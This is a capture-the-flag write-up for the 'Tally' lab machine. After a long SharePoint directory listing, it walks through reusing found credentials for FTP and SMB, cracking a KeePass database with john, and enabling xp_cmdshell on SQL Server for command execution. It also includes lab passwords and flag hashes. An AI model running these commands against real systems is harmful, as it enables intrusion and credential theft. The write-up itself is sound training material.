tally
nmap
Lets start off with an nmapAutomator scan
nmapAutomator
---------------------------------------------------------------------------------------------------------------------------------------------
gobuster
sharepoint
cat sharepoint_gobust.txt | more
/_app_bin (Status: 301)
/_controltemplates (Status: 301)
/_layouts (Status: 301)
/_layouts/1033 (Status: 301)
/_layouts/1033/avreport.htm (Status: 200)
/_layouts/1033/error.htm (Status: 200)
/_layouts/1033/filedlg.htm (Status: 200)
/_layouts/1033/fontdlg.htm (Status: 200)
/_layouts/1033/images (Status: 301)
/_layouts/1033/iframe.htm (Status: 200)
/_layouts/1033/instable.htm (Status: 200)
/_layouts/1033/menu.htc (Status: 200)
/_layouts/1033/menubar.htc (Status: 200)
/_layouts/1033/selcolor.htm (Status: 200)
/_layouts/1033/spthemes.xsd (Status: 200)
/_layouts/1033/spthemes.xml (Status: 200)
/_layouts/accessdenied.aspx (Status: 302)
/_layouts/addcontenttypetolist.aspx (Status: 302)
/_layouts/addfieldfromtemplate.aspx (Status: 302)
/_layouts/aclinv.aspx (Status: 302)
/_layouts/addwrkfl.aspx (Status: 302)
/_layouts/advsetng.aspx (Status: 302)
/_layouts/adminrecyclebin.aspx (Status: 302)
/_layouts/addrole.aspx (Status: 302)
/_layouts/approve.aspx (Status: 302)
/_layouts/aspxform.aspx (Status: 302)
/_layouts/addnavigationlinkdialog.aspx (Status: 200)
/_layouts/addfiletype.aspx (Status: 200)
/_layouts/addservernamemappings.aspx (Status: 200)
/_layouts/areanavigationsettings.aspx (Status: 200)
/_layouts/areatemplatesettings.aspx (Status: 200)
/_layouts/addcontentsource.aspx (Status: 200)
/_layouts/areacachesettings.aspx (Status: 200)
/_layouts/assetedithyperlink.aspx (Status: 200)
/_layouts/areawelcomepage.aspx (Status: 200)
/_layouts/assetimagepicker.aspx (Status: 200)
/_layouts/assocwrkfl.aspx (Status: 302)
/_layouts/associatedgroups.aspx (Status: 302)
/_layouts/audience_memberlist.aspx (Status: 200)
/_layouts/assetportalbrowser.aspx (Status: 200)
/_layouts/audience_main.aspx (Status: 200)
/_layouts/audience_edit.aspx (Status: 200)
/_layouts/assetuploader.aspx (Status: 200)
/_layouts/audience_list.aspx (Status: 200)
/_layouts/audience_defruleedit.aspx (Status: 200)
/_layouts/auditsettings.aspx (Status: 200)
/_layouts/audience_view.aspx (Status: 200)
/_layouts/audience_sched.aspx (Status: 200)
/_layouts/backlinks.aspx (Status: 302)
/_layouts/authenticate.aspx (Status: 302)
/_layouts/avreport.aspx (Status: 302)
/_layouts/bdcadminui/bdcapplications.aspx (Status: 200)
/_layouts/bdcadminui/exportbdcapplication.aspx (Status: 200)
/_layouts/bdcadminui/bdcentities.aspx (Status: 200)
/_layouts/bdcadminui/bdcentities.aspx (Status: 200)
/_layouts/bdcadminui/editbdcaction.aspx (Status: 200)
/_layouts/bdcadminui/addbdcaction.aspx (Status: 200)
/_layouts/bdcadminui/addbdcapplication.aspx (Status: 200)
/_layouts/barcodeimagefromitem.aspx (Status: 200)
/_layouts/bdcadminui/viewbdcentity.aspx (Status: 200)
/_layouts/bdcadminui/viewbdcapplication.aspx (Status: 200)
/_layouts/bdcadminui/managepermissions.aspx (Status: 200)
/_layouts/bestbet.aspx (Status: 302)
/_layouts/changecontenttypeoptionalsettings.aspx (Status: 302)
/_layouts/bulkwrktaskip.aspx (Status: 200)
/_layouts/bulkwrktaskhandler.aspx (Status: 200)
/_layouts/bpcf.aspx (Status: 302)
/_layouts/businessdatasynchronizer.aspx (Status: 302)
/_layouts/changesitemasterpage.aspx (Status: 200)
/_layouts/category.aspx (Status: 302)
/_layouts/changecontenttypeorder.aspx (Status: 302)
/_layouts/changefieldorder.aspx (Status: 302)
/_layouts/checkin.aspx (Status: 302)
/_layouts/cmsslwpaddeditlink.aspx (Status: 200)
/_layouts/cmsslwpaddeditgroup.aspx (Status: 200)
/_layouts/cmsslwpeditview.aspx (Status: 200)
/_layouts/cmsslwpsortlinks.aspx (Status: 200)
/_layouts/contenttypeconvertersettings.aspx (Status: 200)
/_layouts/convertersettings.aspx (Status: 200)
/_layouts/contentaccessaccount.aspx (Status: 200)
/_layouts/copyresults.aspx (Status: 302)
/_layouts/containerpicker.aspx (Status: 302)
/_layouts/copyrole.aspx (Status: 302)
/_layouts/copy.aspx (Status: 302)
/_layouts/conngps.aspx (Status: 302)
/_layouts/confirmation.aspx (Status: 302)
/_layouts/crawledproperty.aspx (Status: 302)
/_layouts/create.aspx (Status: 302)
/_layouts/copyutil.aspx (Status: 302)
/_layouts/createadaccount.aspx (Status: 302)
/_layouts/cstwrkflip.aspx (Status: 200)
/_layouts/ctdmsettings.aspx (Status: 200)
/_layouts/createworkbook.aspx (Status: 200)
/_layouts/customizereport.aspx (Status: 200)
/_layouts/createpage.aspx (Status: 200)
/_layouts/createws.aspx (Status: 302)
/_layouts/createwebpage.aspx (Status: 302)
/_layouts/ctypedit.aspx (Status: 302)
/_layouts/ctypenew.aspx (Status: 302)
/_layouts/discbar.aspx (Status: 302)
/_layouts/dws.aspx (Status: 302)
/_layouts/deletemu.aspx (Status: 302)
/_layouts/download.aspx (Status: 302)
/_layouts/doctrans.aspx (Status: 302)
/_layouts/dladvopt.aspx (Status: 302)
/_layouts/deleteweb.aspx (Status: 302)
/_layouts/deactivatefeature.aspx (Status: 302)
/_layouts/dynamicimageprovider.aspx (Status: 200)
/_layouts/dmplaceholder.aspx (Status: 200)
/_layouts/editnav.aspx (Status: 302)
/_layouts/editgrp.aspx (Status: 302)
/_layouts/editprms.aspx (Status: 302)
/_layouts/editcopyinformation.aspx (Status: 302)
/_layouts/editdsserver.aspx (Status: 200)
/_layouts/editprofile.aspx (Status: 200)
/_layouts/editcrawlrule.aspx (Status: 200)
/_layouts/editpolicy.aspx (Status: 200)
/_layouts/editproperty.aspx (Status: 200)
/_layouts/editcontentsource.aspx (Status: 200)
/_layouts/editrole.aspx (Status: 302)
/_layouts/editpropertynames.aspx (Status: 200)
/_layouts/editpropertynames2.aspx (Status: 200)
/_layouts/editrelevancesettings.aspx (Status: 200)
/_layouts/editview.aspx (Status: 302)
/_layouts/enhancedsearch.aspx (Status: 302)
/_layouts/emaildetails.aspx (Status: 302)
/_layouts/error.aspx (Status: 302)
/_layouts/emailsettings.aspx (Status: 302)
/_layouts/enablealerts.aspx (Status: 200)
/_layouts/ewrcustomfilter.aspx (Status: 200)
/_layouts/editschedule.aspx (Status: 200)
/_layouts/editsection.aspx (Status: 200)
/_layouts/ewrfilter.aspx (Status: 200)
/_layouts/ewrfind.aspx (Status: 200)
/_layouts/excelcellpicker.aspx (Status: 200)
/_layouts/ewrpredialog.aspx (Status: 200)
/_layouts/ewrtop10.aspx (Status: 200)
/_layouts/excelserversafedataprovider.aspx (Status: 200)
/_layouts/excelservertrustedlocation.aspx (Status: 200)
/_layouts/excelprofilepage.aspx (Status: 200)
/_layouts/excelservertrusteddcl.aspx (Status: 200)
/_layouts/excelserversafedataproviders.aspx (Status: 200)
/_layouts/excelserversettings.aspx (Status: 200)
/_layouts/excelservertrusteddcls.aspx (Status: 200)
/_layouts/excelrenderer.aspx (Status: 200)
/_layouts/excelserveruserdefinedfunction.aspx (Status: 200)
/_layouts/exportpolicy.aspx (Status: 200)
/_layouts/excelserveruserdefinedfunctions.aspx (Status: 200)
/_layouts/excelservertrustedlocations.aspx (Status: 200)
/_layouts/feed.aspx (Status: 200)
/_layouts/exemptpolicy.aspx (Status: 200)
/_layouts/filter.aspx (Status: 302)
/_layouts/fldeditex.aspx (Status: 302)
/_layouts/fldedit.aspx (Status: 302)
/_layouts/filtervaluespickerdialog.aspx (Status: 302)
/_layouts/formedt.aspx (Status: 302)
/_layouts/fldnew.aspx (Status: 302)
/_layouts/fldpick.aspx (Status: 302)
/_layouts/fldnewex.aspx (Status: 302)
/_layouts/formresource.aspx (Status: 200)
/_layouts/folders.aspx (Status: 200)
/_layouts/groups.aspx (Status: 302)
/_layouts/genericpicker.aspx (Status: 302)
/_layouts/gear.aspx (Status: 302)
/_layouts/formserver.aspx (Status: 200)
/_layouts/getssploginfo.aspx (Status: 200)
/_layouts/getsspstatus.aspx (Status: 200)
/_layouts/formserverattachments.aspx (Status: 200)
/_layouts/formserverdetector.aspx (Status: 200)
/_layouts/getdataconnectionfile.aspx (Status: 200)
/_layouts/getsspscopes.aspx (Status: 200)
/_layouts/htmltrredir.aspx (Status: 302)
/_layouts/helpsearch.aspx (Status: 302)
/_layouts/help.aspx (Status: 302)
/_layouts/htmltrverify.aspx (Status: 302)
/_layouts/iframe.aspx (Status: 302)
/_layouts/htmledit.aspx (Status: 302)
/_layouts/helpcontent.aspx (Status: 302)
/_layouts/htmltranslate.aspx (Status: 302)
/_layouts/images/ (Status: 403)
/_layouts/infopage.aspx (Status: 302)
/_layouts/holdreport.aspx (Status: 200)
/_layouts/hold.aspx (Status: 200)
/_layouts/irm.aspx (Status: 302)
/_layouts/itemrwfassoc.aspx (Status: 302)
/_layouts/irmrept.aspx (Status: 302)
/_layouts/indxcol.aspx (Status: 302)
/_layouts/iniwrkflip.aspx (Status: 200)
/_layouts/importpolicy.aspx (Status: 200)
/_layouts/listedit.aspx (Status: 302)
/_layouts/labelimage.aspx (Status: 200)
/_layouts/listgeneralsettings.aspx (Status: 302)
/_layouts/linkscheckerwiz.aspx (Status: 200)
/_layouts/keyword.aspx (Status: 302)
/_layouts/listfeed.aspx (Status: 302)
/_layouts/linkschecker.aspx (Status: 200)
/_layouts/iviewhost.aspx (Status: 200)
/_layouts/listkeywords.aspx (Status: 302)
/_layouts/listenabletargeting.aspx (Status: 200)
/_layouts/listcontentsources.aspx (Status: 200)
/_layouts/listsyndication.aspx (Status: 302)
/_layouts/login.aspx (Status: 302)
/_layouts/listservernamemappings.aspx (Status: 200)
/_layouts/logsummary.aspx (Status: 200)
/_layouts/managecontenttype.aspx (Status: 302)
/_layouts/longrunningoperationprogress.aspx (Status: 200)
/_layouts/logviewer.aspx (Status: 200)
/_layouts/lstsetng.aspx (Status: 302)
/_layouts/managecheckedoutfiles.aspx (Status: 302)
/_layouts/managecontenttypefield.aspx (Status: 302)
/_layouts/lroperationstatus.aspx (Status: 200)
/_layouts/managefiletypes.aspx (Status: 200)
/_layouts/managefeatures.aspx (Status: 302)
/_layouts/managefeatures.aspx?scope=site (Status: 302)
/_layouts/managedproperty.aspx (Status: 302)
/_layouts/managecopies.aspx (Status: 302)
/_layouts/manageprivacypolicy.aspx (Status: 200)
/_layouts/managecrawlrules.aspx (Status: 200)
/_layouts/manageitemscheduling.aspx (Status: 200)
/_layouts/matchingrule.aspx (Status: 302)
/_layouts/manageservicepermissions.aspx (Status: 200)
/_layouts/mgrproperty.aspx (Status: 200)
/_layouts/metaweblog.aspx (Status: 302)
/_layouts/mngfield.aspx (Status: 302)
/_layouts/mngsiteadmin.aspx (Status: 302)
/_layouts/mngdisc.aspx (Status: 200)
/_layouts/mcontent.aspx (Status: 302)
/_layouts/mgrdsserver.aspx (Status: 200)
/_layouts/mngsubwebs.aspx (Status: 302)
/_layouts/mngctype.aspx (Status: 302)
/_layouts/mobile/bloghome.aspx (Status: 302)
/_layouts/mngsubwebs.aspx?view=sites (Status: 302)
/_layouts/mobile/delete.aspx (Status: 302)
/_layouts/mobile/dispform.aspx (Status: 302)
/_layouts/mobile/mblerror.aspx (Status: 302)
/_layouts/mobile/mbllists.aspx (Status: 302)
/_layouts/mobile/disppost.aspx (Status: 302)
/_layouts/mobile/editform.aspx (Status: 302)
/_layouts/mobile/mbllogout.aspx (Status: 302)
/_layouts/mobile/default.aspx (Status: 302)
/_layouts/mobile/mbllogin.aspx (Status: 302)
/_layouts/mobile/mobileformserver.aspx (Status: 200)
/_layouts/mobile/viewcomment.aspx (Status: 302)
/_layouts/mobile/newcomment.aspx (Status: 302)
/_layouts/mobile/view.aspx (Status: 302)
/_layouts/mobile/newpost.aspx (Status: 302)
/_layouts/mtgredir.aspx (Status: 302)
/_layouts/myinfo.aspx (Status: 200)
/_layouts/mymemberships.aspx (Status: 200)
/_layouts/modwrkflip.aspx (Status: 200)
/_layouts/mobile/newform.aspx (Status: 302)
/_layouts/mycontactlinks.aspx (Status: 200)
/_layouts/mysubs.aspx (Status: 302)
/_layouts/mysite.aspx (Status: 200)
/_layouts/mypage.aspx (Status: 200)
/_layouts/newdwp.aspx (Status: 302)
/_layouts/mysiteheader.aspx (Status: 200)
/_layouts/navoptions.aspx (Status: 302)
/_layouts/myquicklinks.aspx (Status: 200)
/_layouts/mytasks.aspx (Status: 302)
/_layouts/newnav.aspx (Status: 302)
/_layouts/newsbweb.aspx (Status: 302)
/_layouts/newgrp.aspx (Status: 302)
/_layouts/newlink.aspx (Status: 302)
/_layouts/new.aspx (Status: 302)
/_layouts/newmws.aspx (Status: 302)
/_layouts/newpagelayout.aspx (Status: 200)
/_layouts/newtranslationmanagement.aspx (Status: 200)
/_layouts/pageversioninfo.aspx (Status: 200)
/_layouts/officialfilesuccess.aspx (Status: 200)
/_layouts/officialfilesetup.aspx (Status: 200)
/_layouts/nocrawlsettings.aspx (Status: 200)
/_layouts/newvariationsite.aspx (Status: 200)
/_layouts/osssearchresults.aspx (Status: 302)
/_layouts/password.aspx (Status: 302)
/_layouts/pagesettings.aspx (Status: 200)
/_layouts/objectcachesettings.aspx (Status: 200)
/_layouts/people.aspx (Status: 302)
/_layouts/pickertreeview.aspx (Status: 200)
/_layouts/personalsites.aspx (Status: 200)
/_layouts/pickerresult.aspx (Status: 200)
/_layouts/policy.aspx (Status: 200)
/_layouts/picker.aspx (Status: 302)
/_layouts/people.aspx?membershipgroupid=0 (Status: 302)
/_layouts/permsetup.aspx (Status: 302)
/_layouts/policyconfig.aspx (Status: 200)
/_layouts/portal.aspx (Status: 302)
/_layouts/portalview.aspx (Status: 302)
/_layouts/prjsetng.aspx (Status: 302)
/_layouts/profileredirect.aspx (Status: 302)
/_layouts/policylist.aspx (Status: 200)
/_layouts/postback.formserver.aspx (Status: 200)
/_layouts/policycts.aspx (Status: 200)
/_layouts/print.formserver.aspx (Status: 200)
/_layouts/printloader.formserver.aspx (Status: 200)
/_layouts/profadminedit.aspx (Status: 200)
/_layouts/profnew.aspx (Status: 200)
/_layouts/profmain.aspx (Status: 200)
/_layouts/proxy.aspx (Status: 200)
/_layouts/qstnew.aspx (Status: 302)
/_layouts/qlreord.aspx (Status: 302)
/_layouts/qstedit.aspx (Status: 302)
/_layouts/publishback.aspx (Status: 302)
/_layouts/quicklinks.aspx (Status: 200)
/_layouts/quicklinksdialog.aspx (Status: 200)
/_layouts/profmngr.aspx (Status: 200)
/_layouts/reghost.aspx (Status: 302)
/_layouts/rcxform.aspx (Status: 302)
/_layouts/regionalsetng.aspx (Status: 302)
/_layouts/recyclebin.aspx (Status: 302)
/_layouts/quiklnch.aspx (Status: 302)
/_layouts/redirect.aspx (Status: 302)
/_layouts/redirectpage.aspx (Status: 200)
/_layouts/redirectpage.aspx?target={sitecollectionurl}_catalogs/masterpage (Status: 200)
/_layouts/quicklinksdialogform.aspx (Status: 200)
/_layouts/quicklinksdialog2.aspx (Status: 200)
/_layouts/reorder.aspx (Status: 302)
/_layouts/reqfeatures.aspx (Status: 302)
/_layouts/reqgroup.aspx (Status: 302)
/_layouts/reqacc.aspx (Status: 302)
/_layouts/remwrkfl.aspx (Status: 302)
/_layouts/reqgroupconfirm.aspx (Status: 302)
/_layouts/reporting.aspx (Status: 200)
/_layouts/rellinksscopesettings.aspx (Status: 200)
/_layouts/resolverecipient.aspx (Status: 200)
/_layouts/renderudc.aspx (Status: 200)
/_layouts/releasehold.aspx (Status: 200)
/_layouts/rssxslt.aspx (Status: 302)
/_layouts/role.aspx (Status: 302)
/_layouts/rfpxform.aspx (Status: 302)
/_layouts/rfcxform.aspx (Status: 302)
/_layouts/rte2ecell.aspx (Status: 200)
/_layouts/savetmpl.aspx (Status: 302)
/_layouts/scope.aspx (Status: 302)
/_layouts/rtedialog.aspx (Status: 302)
/_layouts/scopedisplaygroup.aspx (Status: 302)
/_layouts/scsignup.aspx (Status: 302)
/_layouts/rte2erowcolsize.aspx (Status: 200)
/_layouts/reusabletextpicker.aspx (Status: 200)
/_layouts/rte2pueditor.aspx (Status: 200)
/_layouts/rte2etable.aspx (Status: 200)
/_layouts/schema.aspx (Status: 200)
/_layouts/runreport.aspx (Status: 200)
/_layouts/searchresults.aspx (Status: 302)
/_layouts/searchresultremoval.aspx (Status: 200)
/_layouts/searchreset.aspx (Status: 200)
/_layouts/searchandaddtohold.aspx (Status: 200)
/_layouts/selectcrawledproperty.aspx (Status: 302)
/_layouts/selectmanagedproperty.aspx (Status: 302)
/_layouts/searchsspsettings.aspx (Status: 200)
/_layouts/selectuser.aspx (Status: 200)
/_layouts/selectpicture2.aspx (Status: 200)
/_layouts/setimport.aspx (Status: 200)
/_layouts/selectpicture.aspx (Status: 200)
/_layouts/setrqacc.aspx (Status: 302)
/_layouts/setanon.aspx (Status: 302)
/_layouts/sendtoofficialfile.aspx (Status: 401)
/_layouts/signout.aspx (Status: 302)
/_layouts/settings.aspx (Status: 302)
/_layouts/siterss.aspx (Status: 302)
/_layouts/signaturedetailsloader.formserver.aspx (Status: 200)
/_layouts/signaturedetails.formserver.aspx (Status: 200)
/_layouts/signaturedetailspngloader.formserver.aspx (Status: 200)
/_layouts/sitecachesettings.aspx (Status: 200)
/_layouts/signatureeula.formserver.aspx (Status: 200)
/_layouts/sitemanager.aspx?lro=all (Status: 200)
/_layouts/signature.formserver.aspx (Status: 200)
/_layouts/sitemanager.aspx (Status: 200)
/_layouts/sitedirectorysettings.aspx (Status: 200)
/_layouts/smtcommentsdialog.aspx (Status: 200)
/_layouts/slnew.aspx (Status: 200)
/_layouts/spusageconfig.aspx (Status: 200)
/_layouts/spellchecker.aspx (Status: 200)
/_layouts/sledit.aspx (Status: 200)
/_layouts/spsredirect.aspx (Status: 200)
/_layouts/spnewdashboard.aspx (Status: 200)
/_layouts/spcf.aspx (Status: 302)
/_layouts/sitesubs.aspx (Status: 302)
/_layouts/spcontnt.aspx (Status: 302)
/_layouts/spusagesiteclickthroughs.aspx (Status: 200)
/_layouts/spusagesitereferrers.aspx (Status: 200)
/_layouts/spusagesitesearchqueries.aspx (Status: 200)
/_layouts/spusagesitesearchresults.aspx (Status: 200)
/_layouts/spusagesitehomepage.aspx (Status: 200)
/_layouts/spusagesite.aspx (Status: 200)
/_layouts/spusagewebusers.aspx (Status: 200)
/_layouts/spusagewebtoppages.aspx (Status: 200)
/_layouts/spusagesitetoppages.aspx (Status: 200)
/_layouts/spusagewebclickthroughs.aspx (Status: 200)
/_layouts/spusagesspsearchqueries.aspx (Status: 200)
/_layouts/spusagesspsearchresults.aspx (Status: 200)
/_layouts/spusageweb.aspx (Status: 200)
/_layouts/spusagewebreferrers.aspx (Status: 200)
/_layouts/spusagesiteusers.aspx (Status: 200)
/_layouts/spusagewebhomepage.aspx (Status: 200)
/_layouts/ssologon.aspx (Status: 200)
/_layouts/subchoos.aspx (Status: 302)
/_layouts/submitrepair.aspx (Status: 302)
/_layouts/storman.aspx (Status: 302)
/_layouts/subnew.aspx (Status: 302)
/_layouts/srchvis.aspx (Status: 302)
/_layouts/srchrss.aspx (Status: 302)
/_layouts/success.aspx (Status: 302)
/_layouts/subedit.aspx (Status: 302)
/_layouts/topnav.aspx (Status: 302)
/_layouts/survedit.aspx (Status: 302)
/_layouts/updatecopies.aspx (Status: 302)
/_layouts/themeweb.aspx (Status: 302)
/_layouts/toolpane.aspx (Status: 302)
/_layouts/templatepick.aspx (Status: 302)
/_layouts/tnreord.aspx (Status: 302)
/_layouts/updateschedule.aspx (Status: 200)
/_layouts/translatablesettings.aspx (Status: 200)
/_layouts/unapprovedresources.aspx (Status: 200)
/_layouts/userdisp.aspx?id=1 (Status: 302)
/_layouts/user.aspx (Status: 302)
/_layouts/useconfirmation.aspx (Status: 302)
/_layouts/usage.aspx (Status: 302)
/_layouts/usagedetails.aspx (Status: 302)
/_layouts/upload.aspx (Status: 302)
/_layouts/userdisp.aspx (Status: 302)
/_layouts/useredit.aspx (Status: 302)
/_layouts/useredit.aspx?id=1&source=%2f%5flayouts%2fpeople%2easpx (Status: 302)
/_layouts/versiondiff.aspx (Status: 302)
/_layouts/versions.aspx (Status: 302)
/_layouts/variationsettings.aspx (Status: 200)
/_layouts/variations/variationimport.aspx (Status: 200)
/_layouts/variationlabel.aspx (Status: 200)
/_layouts/variationexport.aspx (Status: 200)
/_layouts/variationlogs.aspx (Status: 200)
/_layouts/variationlabels.aspx (Status: 200)
/_layouts/viewscopesettings.aspx (Status: 302)
/_layouts/viewnew.aspx (Status: 302)
/_layouts/viewlsts.aspx (Status: 302)
/_layouts/viewedit.aspx (Status: 302)
/_layouts/viewtype.aspx (Status: 302)
/_layouts/vsubwebs.aspx (Status: 302)
/_layouts/viewgrouppermissions.aspx (Status: 302)
/_layouts/viewscopes.aspx (Status: 302)
/_layouts/webpartgallerypickerpage.aspx (Status: 302)
/_layouts/webdeleted.aspx (Status: 302)
/_layouts/workspce.aspx (Status: 302)
/_layouts/workflow.aspx (Status: 302)
/_layouts/wpprevw.aspx (Status: 302)
/_layouts/wpeula.aspx (Status: 302)
/_layouts/wrksetng.aspx (Status: 302)
/_layouts/wpprevw.aspx?id=247 (Status: 302)
/_layouts/wrkstat.aspx (Status: 302)
/_layouts/wsrpmarkupproxy.aspx (Status: 200)
/_layouts/zoombldr.aspx (Status: 302)
/_vti_bin (Status: 301)
/_vti_bin/_vti_adm/admin.dll (Status: 200)
/_vti_bin/alertsdisco.aspx (Status: 200)
/_vti_bin/_vti_aut/author.dll (Status: 200)
/_vti_bin/alerts.asmx (Status: 200)
/_layouts/xlatewfassoc.aspx (Status: 200)
/_vti_adm/admin.asmx (Status: 200)
/_vti_bin/alertswsdl.aspx (Status: 200)
/_layouts/xlviewer.aspx (Status: 200)
/_layouts/wrktaskip.aspx (Status: 200)
/_vti_bin/dspsts.asmx (Status: 200)
/_vti_bin/dspstsdisco.aspx (Status: 200)
/_vti_bin/authentication.asmx (Status: 200)
/_vti_bin/copy.asmx (Status: 200)
/_vti_bin/dspstswsdl.aspx (Status: 200)
/_vti_bin/dws.asmx (Status: 200)
/_vti_bin/dwsdisco.aspx (Status: 200)
/_vti_bin/exportwp.aspx (Status: 302)
/_vti_bin/dwswsdl.aspx (Status: 200)
/_vti_bin/forms.asmx (Status: 200)
/_vti_bin/imaging.asmx (Status: 200)
/_vti_bin/formsdisco.aspx (Status: 200)
/_vti_bin/imagingdisco.aspx (Status: 200)
/_vti_bin/formswsdl.aspx (Status: 200)
/_vti_bin/listsdisco.aspx (Status: 200)
/_vti_bin/meetings.asmx (Status: 200)
/_vti_bin/lists.asmx (Status: 200)
/_vti_bin/meetingsdisco.aspx (Status: 200)
/_vti_bin/imagingwsdl.aspx (Status: 200)
/_vti_bin/meetingswsdl.aspx (Status: 200)
/_vti_bin/listswsdl.aspx (Status: 200)
/_vti_bin/people.asmx (Status: 200)
/_vti_bin/permissions.asmx (Status: 200)
/_vti_bin/microsoft.sharepoint.xml (Status: 200)
/_vti_bin/searchdisco.aspx (Status: 200)
/_vti_bin/search.asmx (Status: 200)
/_vti_bin/publishedlinksservice.asmx (Status: 200)
/_vti_bin/permissionswsdl.aspx (Status: 200)
/_vti_bin/permissionsdisco.aspx (Status: 200)
/_vti_bin/sitedatadisco.aspx (Status: 200)
/_vti_bin/sitedata.asmx (Status: 200)
/_vti_bin/sitedatawsdl.aspx (Status: 200)
/_vti_bin/searchwsdl.aspx (Status: 200)
/_vti_bin/sites.asmx (Status: 200)
/_vti_bin/shtml.dll (Status: 200)
/_vti_bin/sharepointemailws.asmx (Status: 200)
/_vti_bin/sitesdisco.aspx (Status: 200)
/_vti_bin/siteswsdl.aspx (Status: 200)
/_vti_bin/owssvr.dll (Status: 401)
/_vti_bin/expurlwp.aspx (Status: 302)
/_layouts/wrkmng.aspx (Status: 401)
/_vti_bin/spsearch.asmx (Status: 200)
/_vti_bin/usergroup.asmx (Status: 200)
/_vti_bin/spdisco.aspx (Status: 200)
/_vti_bin/versions.asmx (Status: 200)
/_vti_bin/usergroupdisco.aspx (Status: 200)
/_vti_bin/versionswsdl.aspx (Status: 200)
/_vti_bin/viewsdisco.aspx (Status: 200)
/_vti_bin/versionsdisco.aspx (Status: 200)
/_vti_bin/views.asmx (Status: 200)
/_vti_bin/usergroupwsdl.aspx (Status: 200)
/_vti_bin/viewswsdl.aspx (Status: 200)
/_vti_bin/webs.asmx (Status: 200)
/_vti_bin/websdisco.aspx (Status: 200)
/_vti_bin/webswsdl.aspx (Status: 200)
/_vti_bin/webpartpageswsdl.aspx (Status: 200)
/_vti_bin/webpartpages.asmx (Status: 200)
/_vti_bin/webpartpagesdisco.aspx (Status: 200)
/_wpresources (Status: 301)
/_vti_pvt (Status: 301)
/_vti_inf.html (Status: 200)
/alerts.asmx (Status: 200)
/app_browsers (Status: 301)
/app_globalresources (Status: 301)
/areaservice.asmx (Status: 200)
/aspnet_client (Status: 301)
/bin (Status: 301)
/default.aspx (Status: 200)
/docs/_layouts/viewlsts.aspx (Status: 302)
/dspsts.asmx (Status: 200)
/dws.asmx (Status: 200)
/forms.asmx (Status: 200)
/imaging.asmx (Status: 200)
/lists.asmx (Status: 200)
/meetings.asmx (Status: 200)
/mysite/_layouts/mysite.aspx (Status: 200)
/news/_layouts/viewlsts.aspx (Status: 302)
/outlookadapter.asmx (Status: 200)
/permissions.asmx (Status: 200)
/search.asmx (Status: 200)
/searchcenter/_layouts/viewlsts.aspx (Status: 302)
/sitedata.asmx (Status: 200)
/sitedirectory/_layouts/viewlsts.aspx (Status: 302)
/shared documents/forms/allitems.aspx (Status: 200)
/sites.asmx (Status: 200)
/spscrawl.asmx (Status: 200)
/userprofileservice.asmx (Status: 200)
/usergroup.asmx (Status: 200)
/versions.asmx (Status: 200)
/views.asmx (Status: 200)
/webpartpages.asmx (Status: 200)
/webs.asmx (Status: 200)
/wpresources (Status: 301)
viewlists.aspx
To view these documents, download libreoffice if you don't already have it installed with
/Documents
lets view the contents of this word document withlibreoffice ftp-details.docxpassword:UTDRSCH53c"$6hys
Site Pages
No need for libreoffice since clicking this link redirects us to the doc within our webbrowser.
ftp
we can use our creds from the sharepoint documents to authenticate as ftp_user:UTDRSCH53c"$6hys and recursively download all of the ftp servers contents withwget --mirror 'ftp://ftp_user:UTDRSCH53c"$6hys@10.10.10.59'doing so creates a directory for us we can enumerate:
find . -type f
lets run a find command and look for files stored within the ftp server that may be interestingfind . -type fwhere. runs find on our current directory and
-type f specifies find will return only fileswe see there are a number of keepass database files that may contain sensitive information on our target, lets see if we can use kpcli without a password to view itkpcli -kdb ./Tim/Files/tim.kdbxits password protected, which means we need to crack its password in order to view its contents, luckily jumbojohn has just the tools we need
keepass
because we're cracking a keepass password and we need to supply john with a password hash format it can crack, we'll first use keepass2john to generate a password hash and then run it against a password list (rockyou.txt) in john itselfkeepass2john ./Tim/Files/tim.kdbx > tim_kdbx_hashjohn --format=keepass --wordlist=/usr/share/wordlists/rockyou.txtour password is simplementeyo!
smb
2 ways to read TALLY's Finance smb share
1)mounting the smb account share with mount
2)connecting to the smb share with smbclient
connecting to the smb share with smbclient
smbclient //10.10.10.59/ACCT -U Financerecall the share password Acc0unting
zz_Archived (dead end)
old server creds will NOT connect us to the database, looking at the strings of tester.exe will
zz_Migration/Binaries/New Folder/tester.exe
running strings on tester.exe will also list the database creds in its outputstrings tester.exeDRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
sqsh interactive database shell
We'll be able to preform remote code execution on the SQL server we found by connecting to it via sqsh and issuing commands within itconnect with sqsh -S 10.10.10.59 -U sa -P “GWE3V65#6KFH93@4GWTG2G”where -S specifies server
-U specifies user
-P specifies pass
xp_cmdshell does not exist
xp_cmdshell 'whoami;'
gowhen we try to run ‘whoami’ we get a response from the server saying the xp_cmdshell component is turned off, so we'll have to change the settings which enable xp_cmdshell to execute
reconfigure
to do this, we'll need to use the EXEC SP_CONFIGURE commandEXEC SP_CONFIGURE ‘xp_cmdshell’, 1we get a server response saying that either xp_cmdshell doesn't exist or it is an advanced option feature,EXEC SP_CONFIGURE 'show advanced options', 1
EXEC SP_CONFIGURE ‘xp_cmdshell’, 1
reconfigure
gonow we can toggle the database to use xp_cmdshell to run commands
xp_cmdshell 'whoami'
the sqsh shell is stubborn to put it lightly, so you have to be thorough with each statement you input, you see I tried to cut corners enabling advanced options and xp_cmdshell simultaneously but ran into errors,
its easier to do each EXEC statement one at a time, but don't be surprised when the settings revert after a short period of timeEXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go
reconfigure
go
EXEC SP_CONFIGURE 'xp_cmdshell', 1
reconfigure
go
reconfigure
go
xp_cmdshell 'whoami'
go
the sql database runs as user sarah
privesc w/ juicy potato
For windows machine priv esc, it is always a good idea to see what kind of privileges our owned user has, it may narrow down easy to use priv-esc exploits right on the spot without needing to run a hardy enumeration script like winPEASwhoami /privSeImpersonatePrivilege is Enabled! Which means this box is most likely vulnerable to the very common and very effective juicy potato exploit
priv esc w/ scheduled task
The intended priv esc route is right on Sarah's Desktop
reverse shell
wait until the scheduled tasks runs and we're root!
user/root
be72362e8dffeca2b42406d5d1c74bb1
608bb707348105911c8991108e523eda
Lessons Learned
Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/